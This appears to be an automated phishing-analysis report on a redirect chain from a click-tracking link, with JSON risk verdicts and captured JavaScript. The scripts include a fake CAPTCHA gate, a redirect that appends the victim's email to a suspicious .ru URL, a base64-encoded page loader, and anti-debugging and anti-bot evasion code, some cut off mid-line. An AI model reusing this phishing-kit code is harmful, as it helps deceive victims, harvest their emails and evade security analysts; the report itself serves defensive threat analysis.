Windows Analysis Report
https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFq

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://clickme.thryv.com

{
    "contains_trigger_text": true,
    "trigger_text": "click this box to continue",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": true,
    "has_urgent_text": true,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
    "risk_score": 2,
    "reasoning": "The script primarily handles CAPTCHA functionality with no high-risk behaviors. It includes DOM manipulation and event handling, which are typical for CAPTCHA scripts. There is no evidence of data exfiltration, dynamic code execution, or interaction with external domains. The script uses aggressive DOM manipulation, but this is expected in CAPTCHA implementations. Overall, it appears to be a benign script with no harmful intent."
}

function isNumber(evt) {
  var charCode = (evt.which) ? evt.which : evt.keyCode
  if (charCode > 31 && (charCode < 48 || charCode > 57))
    return false;
  return true;
}
var anwser;

function loadCaptcha() {
    document.querySelector(".captcha-loader").style.display = "none";
    document.querySelector(".captcha-checkbox").style.display = "none";
    document.querySelector(".captcha-content").style.display = "flex";
}

function verifyCaptcha() {
    const captchaInput = document.getElementById("captchaInput").value;
    document.querySelector(".captcha-content").style.display = "none";
    document.querySelector(".captcha-checkbox").style.display = "flex";
    document.querySelector(".captcha-checkmark").style.display = "block";
    document.getElementById("captchaCheckbox").checked = true;
}

function onCheckboxClick() {
    document.querySelector(".captcha-loader").style.display = "block";
    document.querySelector(".captcha-content").style.display = "none";
    document.querySelector(".captcha-checkmark").style.display = "none";
    setTimeout(loadCaptcha, 2000); 
}

document.addEventListener("DOMContentLoaded", function() {
    document.getElementById("captchaCheckbox").addEventListener("click", onCheckboxClick);
    document.getElementById("captchaSubmitButton").addEventListener("click", rfztIaRuZN);        
    document.getElementById("captchaInput").addEventListener("keydown", function(event) {
        if (event.key === "Enter") {
            rfztIaRuZN();
        }
    });
});

const canvas = document.getElementById("captchaCanvas");
const ctx = canvas.getContext("2d");

function getRandomInt(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}

function drawRandomLines(ctx, lineCount) {
    for (let i = 0; i < lineCount; i++) {
        ctx.beginPath();
        ctx.moveTo(getRandomInt(0, canvas.width), getRandomInt(0, canvas.height));
        ctx.lineTo(getRandomInt(0, canvas.width), getRandomInt(0, canvas.height));
        ctx.strokeStyle = `rgba(${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, 0.7)`;
        ctx.lineWidth = getRandomInt(1, 3);
        ctx.stroke();
    }
}

function drawRandomDots(ctx, dotCount) {
    for (let i = 0; i < dotCount; i++) {
        ctx.beginPath();
        ctx.arc(getRandomInt(0, canvas.width), getRandomInt(0, canvas.height), getRandomInt(1, 3), 0, Math.PI * 2);
        ctx.fillStyle = `rgba(${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, 0.5)`;
        ctx.fill();
    }
}

function drawRandomEllipses(ctx, ellipseCount) {
    for (let i = 0; i < ellipseCount; i++) {
        ctx.beginPath();
        ctx.ellipse(getRandomInt(0, canvas.width), getRandomInt(0, canvas.height), getRandomInt(20, 40), getRandomInt(10, 20), Math.PI / 4, 0, 2 * Math.PI);
        ctx.strokeStyle = `rgba(${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, ${getRandomInt(0, 255)}, 0.6)`;
        ctx.lineWidth = 1;
        ctx.stroke();
    }
}

function drawCaptchaText(ctx) {
    const num1 = getRandomInt(1, 9);
    const num2 = getRandomInt(1, 9);
    const captchaText = `${num1} + ${num2}`;
    ctx.font = "40px Arial";
    ctx.fillStyle = "black";
    anwser = num1+num2;
    ctx.fillText(captchaText, canvas.width / 2 - ctx.measureText(captchaText).width / 2, canvas.height / 2 + 15);
}

function drawCaptcha() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    ctx.fillStyle = "#ffffff";
    ctx.fillRect(0, 0, canvas.width, canvas.height);
    drawRandomLines(ctx, 10);
    drawRandomEllipses(ctx, 3);
    drawRandomDots(ctx, 100);
    drawCaptchaText(ctx);
}

drawCaptcha();

        function rfztIaRuZN() {
        var csa = document.getElementById("captchaInput").value;
        if(csa == ""){
        document.getElementById("captchaanwsererr").innerText = "Anwser is required";
        document.getElementById("captchaanwsererr").style.display = "block";
        }
        if(csa !== ""){
        if(csa !== anwser){
        document.getEl

{
    "risk_score": 7,
    "reasoning": "The script redirects users to a suspicious domain (diitalwave.ru) with potential data exfiltration by appending email parameters to the URL. This behavior is indicative of malicious intent, especially given the use of an untrusted domain."
}

        document.addEventListener('DOMContentLoaded', function() {
            setTimeout(redirect, 100);
        });

        // Function to handle redirection
        function redirect() {
            var email = getParameterByName('email');
            var redirectUrl = "https://0hXj.diitalwave.ru/HvdnqK-qqvXHs/#X";

            if (email) {
                redirectUrl += encodeURIComponent(email);
                console.log("Redirecting to: " + redirectUrl);
            } else {
                console.log("No email provided, cannot redirect.");
            }

            window.location.href = redirectUrl;
        }

        // Function to get URL parameters
        function getParameterByName(name, url = window.location.href) {
            name = name.replace(/[\[\]]/g, '\\$&');
            var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)');
            var results = regex.exec(url);
            if (!results) return null;
            if (!results[2]) return '';
            return decodeURIComponent(results[2].replace(/\+/g, ' '));
        }

        // Function to manually trigger redirection via checkbox
        function handleCheckboxClick(checkbox) {
            if (checkbox.checked) {
                console.log("Checkbox is checked. Redirecting...");
                redirect();
            } else {
                console.log("Checkbox is not checked.");
            }
        }
    

{
    "risk_score": 7,
    "reasoning": "The script uses obfuscated code with base64 encoding, which is a high-risk indicator (+3 points). It also includes a dynamic code execution check using 'atob', which is another high-risk indicator (+3 points). The script attempts to load an external script from 'code.jquery.com', a trusted domain, but the obfuscation and potential for dynamic execution suggest suspicious behavior. No clear malicious intent is evident, but the obfuscation and dynamic checks warrant a high-risk score."
}

if(atob("aHR0cHM6Ly8waFhqLmRpaXRhbHdhdmUucnUvSHZkbnFLLXFxdlhIcy8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyOjpiZWZvcmUgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICB0b3A6IDA7DQogICAgbGVmdDogMDsNCiAgICByaWdodDogMDsNCmJvdHRvbTogMDsNCmJhY2tncm91bmQtaW1hZ2U6IHVybCgiaHR0cHM6Ly9ibG9nZ2VyLmdvb2dsZXVzZXJjb250ZW50LmNvbS9pbWcvYi9SMjl2WjJ4bC9BVnZYc0VnZHJoWTZ6TTd0eEVmNjFuUE82N19DbDdyT3lDR3N5RWI5R2FJRXFlM00tcC15TjJuSmVCVUdDWGtEeWdLN3Q4eFlWY0t3U2d1NHYwX3U2RVpGNXNyVWgxNnAwdk5sMUs4aEJlQlY4ZGctS2NPcHQ3eTh2cmthbU1PVTJIeFcwU1RwMEpERXAyMUZXdUNXeERYWlgwRXR4b0xQU0JXUjZXd2hYWmdsWEl2V1hiaDI0b2p1eW9mRDZodFk4RDQvczMzOTYvdXNlcmludGVyLnBuZyIpOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOw0KICAgIGZpbHRlcjogYmx1cigxNHB4KTsNCiAgICB6LWluZGV4OiAtMTsNCn0NCi5jb250ZW50IHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgei1pbmRleDogMTsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOw0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIGNvbG9yOiB3aGl0ZTsNCiAgICBmb250LXNpemU6IDI0cHg7DQogICAgdGV4dC1hbGlnbjogY2VudGVyOw0KfQ0KLmNhcHRjaGEtYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IHNwYWNlLWJldHdlZW47DQogICAgYm9yZGVyOiAxcHggc29saWQgI2QzZDNkMzsNCiAgICBwYWRkaW5nOiAxMHB4Ow0KICAgIHdpZHRoOiAzMDBweDsNCiAgICBtYXJnaW46IDIwcHggYXV0bzsNCiAgICBib3JkZXItcmFkaXVzOiA0cHg7DQogICAgYm94LXNoYWRvdzogMHB4IDJweCA0cHggcmdiYSgwLCAwLCAwLCAwLjIpOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGlucHV0W3R5cGU9ImNoZWNrYm94Il0gew0KICAgIGRpc3BsYXk6IG5vbmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGxhYmVsIHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgY3Vyc29yOiBwb2ludGVyOw0KfQ0KDQouY2FwdGNoYS1jaGVja21hcmsgew0KICAgIHdpZHRoOiAyMHB4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBib3JkZXI6IDJweCBzb2xpZCAjZDNkM2QzOw0KICAgIGJvcmRlci1yYWRpdXM6IDNweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgIG1hcmdpbi1yaWdodDogMTBweDsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGlucHV0W3R5cGU9ImNoZWNrYm94Il06Y2hlY2tlZCArIGxhYmVsIC5jYXB0Y2hhLWNoZWNrbWFyazo6YWZ0ZXIgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICBsZWZ0OiA1cHg7DQogICAgdG9wOiAxcHg7DQogICAgd2lkdGg6IDZweDsNCiAgICBoZWlnaHQ6IDEycHg7DQogICAgYm9yZGVyOiBzb2xpZCAjNGNhZjUwOw0KICAgIGJvcmRlci13aWR0aDogMCAzcHggM3B4IDA7DQogICAgdHJhbnNmb3JtOiByb3RhdGUoNDVkZWcpOw0KfQ0KDQouY2FwdGNoYS10ZXh0IHsNCiAgICBmb250LWZhbWlseTogQXJpYWwsIHNhbnMtc2VyaWY7DQogICAgZm9udC1zaXplOiAxNHB4Ow0KICAgIGNvbG9yOiAjMzMzOw0KfQ0KDQouY2FwdGNoYS1sb2dvIGltZyB7DQogICAgaGVpZ2h0OiA0OHB4Ow0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjphYnNvbHV0ZTsNCiByaWdodDogMjI1cHg7DQogd2lkdGg6MzZweDsNCiBib3gtc2l6aW5nOmJvcmRlci1ib3g7DQogYW5pbWF0aW9uOiBzcGluIGxpbmVhciAxcyBpbmZpbml0ZTsNCiBkaXNwbGF5OiBub25lOw0KDQp9DQoNCkBrZXlmcmFtZXMgc3BpbiB7DQogICAgMCUgeyB0cmFuc2Zvcm06IHJvdGF0ZSgwZGVnKTsgfQ0KICAgIDEwMCUgeyB0cmFu

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "unknown",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": true,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

{
    "risk_score": 5,
    "reasoning": "The script includes aggressive DOM manipulation by preventing default actions for key events and context menu, which is a moderate-risk indicator. It also redirects to a trusted domain (docs.google.com) under certain conditions, which reduces the risk. However, the use of obfuscated variable names and the debugger statement suggests an attempt to detect debugging, which is suspicious. The script's behavior is inconsistent with typical user-friendly practices, warranting further review."
}

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
ddhGMFgsvn = false;
(function hCIItQPcAu() {
    let RIvFsIghrq = false;
    const aLbLjWSJfd = 100;
    setInterval(function() {
        const sTrHFOHOKL = performance.now();
        debugger;
        const hWOERHbrTv = performance.now();
        if (hWOERHbrTv - sTrHFOHOKL > aLbLjWSJfd && !RIvFsIghrq) {
            ddhGMFgsvn = true;
            RIvFsIghrq = true;
            window.location.replace('https://docs.google.com');
        }
    }, 100);
})();

{
  "brands": [
    "Google"
  ]
}

```json{  "legit_domain": "unknown",  "classification": "unknown",  "reasons": [    "The brand name provided is 'u', which does not correspond to any known or well-known brand.",    "The URL 'tafaruqueschoolandcollege.gov.bd' appears to be associated with an educational institution in Bangladesh, as indicated by the '.gov.bd' domain extension.",    "The domain 'gov.bd' is typically used by government and educational institutions in Bangladesh, which suggests legitimacy.",    "There are no obvious misspellings or suspicious elements in the URL.",    "Without a clear brand association, it is difficult to determine if this is a phishing site based solely on the URL."  ],  "riskscore": 3}

URL: tafaruqueschoolandcollege.gov.bd
			Brands: u
			Input Fields: unknown

{
    "contains_trigger_text": false,
    "trigger_text": "unknown",
    "prominent_button_name": "Submit",
    "text_input_field_labels": ["Enter the result"],
    "pdf_icon_visible": false,
    "has_visible_captcha": true,
    "has_urgent_text": true,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": "unknown"
}

```json{  "legit_domain": "unknown",  "classification": "unknown",  "reasons": [    "The URL '0hxj.diitalwave.ru' does not match any known legitimate domain associated with a well-known brand.",    "The domain 'diitalwave.ru' appears suspicious due to the misspelling of 'digital' as 'diital'.",    "The use of a subdomain '0hxj' is unusual and could be an attempt to obfuscate the true nature of the site.",    "The brand 'u' is not recognized and does not provide any clear association with a known or well-known brand.",    "The domain extension '.ru' is not inherently suspicious but should be considered in the context of the other factors.",    "The lack of a clear brand association and the suspicious elements in the URL suggest a high risk of phishing."  ],  "riskscore": 9}
Google indexed: False